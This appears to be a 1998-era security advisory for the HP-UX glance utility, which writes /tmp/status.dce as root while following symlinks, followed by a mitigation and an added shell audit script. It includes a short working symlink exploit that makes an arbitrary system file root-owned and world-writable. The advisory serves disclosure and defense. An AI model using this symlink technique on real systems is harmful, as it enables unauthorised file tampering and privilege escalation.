COMMAND

    glance

SYSTEMS AFFECTED

    HP-UX B.10.20 D (at least tested)

PROBLEM

    J.A. Gutierrez found the following.  glance creates a /tmp/status.dce
    file as root, and it follows symlinks, so you can append text like

    Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
    Performance Management Application registered.
    --------------------------------------------------------------------------

    to any system file.  Sample exploit:

        $ umask 000
        $ cd /tmp
        $ ln -s /.test status.dce
        $ glance -j 1 -iterations 1 -maxpages 1
        $ ls -l /.test
        -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test

        # edit /.test to match your needs

SOLUTION

    Creating a non-writable /tmp/status.dce file and setting the t
    (sticky) bit on /tmp (which the default HP-UX installation does not
    seem to have) would be enough.
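
    The two conditions above can be checked with a short script.  This is
    an added example, not part of the original advisory; the function names
    mode_of and audit_status_dce and the return codes are assumptions.

```shell
#!/bin/sh
# Added example: audit a temp directory for the status.dce symlink exposure.
# Function names and return codes are assumptions of this example.

# mode_of PATH: print the ls -l mode string (e.g. drwxrwxrwt).
# ls -ld does not follow a symlink given as its argument.
mode_of() {
    ls -ld "$1" 2>/dev/null | awk '{print $1}'
}

# audit_status_dce [DIR]: return 0 if both mitigations are in place, 1 otherwise.
audit_status_dce() {
    dir=${1:-/tmp}
    file="$dir/status.dce"
    rc=0

    # 1. Sticky bit on the directory: tenth mode character is t or T.
    #    Without it, any user may remove or rename files owned by others.
    case "$(mode_of "$dir")" in
        d????????[tT]*) ;;
        *) echo "FAIL: $dir has no sticky bit"; rc=1 ;;
    esac

    # 2. status.dce must already exist as a regular, non-writable file.
    if [ -h "$file" ]; then
        echo "FAIL: $file is a symbolic link"; rc=1
    elif [ ! -f "$file" ]; then
        echo "FAIL: $file has not been pre-created"; rc=1
    else
        case "$(mode_of "$file")" in
            -?-??-??-?*) ;;   # no write bit for user, group or other
            *) echo "FAIL: $file has a write bit set"; rc=1 ;;
        esac
    fi

    [ "$rc" -eq 0 ] && echo "OK: $file is protected"
    return "$rc"
}
```

    Run as "audit_status_dce /tmp" after sourcing the file; a non-zero
    return means at least one of the two conditions is missing.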